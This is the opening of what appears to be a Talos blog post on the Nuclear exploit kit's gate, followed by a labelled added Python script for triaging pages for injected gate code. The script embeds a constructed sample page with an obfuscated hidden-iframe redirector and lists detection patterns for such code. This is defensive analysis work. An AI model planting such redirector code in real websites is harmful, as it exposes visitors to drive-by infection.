Introduction
Exploit kits compromise users constantly. Whether the traffic arrives via malvertising or via compromised websites, these kits interact with a large number of users every day. Talos continuously monitors them to ensure protection, analyze changes as they occur, and watch for shifts in payloads. Yesterday we observed a new technique in the Nuclear kit, along with a payload and technique we have not seen before.
Details
It has been a while since we last discussed Nuclear, so let's start with an overview of how users are infected. Like most exploit kits, it has a few key components: a gate, a landing page, and an exploit page that delivers the payload. Let's start by describing the gate we have been observing in association with Nuclear, and specifically the instance tied to this novel payload.
Gate
This particular infection begins with a compromised website. Buried in the site's pages are a couple of lines of injected JavaScript, which you can find below:
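The following is an added example, not the gate script from the post and not Talos code: it shows one way an analyst can triage a page from a suspected compromised site for the kind of injected gate code described above, by listing script tags that load from hosts other than the site itself and inline scripts that show common redirector traits (hidden iframe creation, long percent-encoded or hex-escaped strings). The sample page, the host names in it, and the allow-list are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not taken from the post): a site with its own scripts,
# one script from a CMS vendor CDN that the owner knows about, one script tag
# loading from an unrelated host, and an obfuscated inline script that builds a
# hidden iframe. All host names are placeholders.
SAMPLE_PAGE = """<html><head>
<script src="/static/jquery.min.js"></script>
<script src="https://cdn.example-cms.com/theme.js"></script>
</head><body>
<h1>Welcome</h1>
<script src="http://stats-counter.example.net/js/count.js"></script>
<script>var s=document.createElement('iframe');s.style.display='none';
s.src=decodeURIComponent('%68%74%74%70%3a%2f%2fexample.org%2fin.php');document.body.appendChild(s);</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collects every <script> tag as {"src": str|None, "body": str}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            attrs = dict(attrs)
            self._current = {"src": attrs.get("src"), "body": ""}
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as data, possibly in chunks.
        if self._in_script:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append(self._current)
            self._in_script = False
            self._current = None


# Heuristics for inline redirector code; assumed indicators, not a signature
# for any particular kit.
SUSPICIOUS_INLINE = [
    r"createElement\(['\"]iframe['\"]\)",   # iframe built at runtime
    r"display\s*=\s*['\"]none['\"]",        # element hidden from the user
    r"(?:%[0-9a-fA-F]{2}){6,}",             # long percent-encoded string
    r"(?:\\x[0-9a-fA-F]{2}){6,}",           # long hex-escaped string
]


def find_injected_scripts(html, site_host, allowed_hosts=()):
    """Return (kind, detail) findings: external script sources not on the
    site's own host or the allow-list, and inline scripts matching a heuristic."""
    findings = []
    parser = ScriptCollector()
    parser.feed(html)
    for script in parser.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname
            # Relative sources have no host and are treated as first-party.
            if host and host != site_host and host not in allowed_hosts:
                findings.append(("external-src", script["src"]))
        else:
            if any(re.search(p, script["body"]) for p in SUSPICIOUS_INLINE):
                findings.append(("inline", script["body"].strip()[:60]))
    return findings


if __name__ == "__main__":
    for kind, detail in find_injected_scripts(
        SAMPLE_PAGE, "www.example-site.com", allowed_hosts=("cdn.example-cms.com",)
    ):
        print(kind, detail)
```

Run it against a saved copy of the page rather than a live fetch, so the triage does not itself request the gate. The allow-list is where the site owner's known third-party scripts go; anything left over is what to pull apart next, and in a real case the flagged inline body is usually obfuscated further than the sample here.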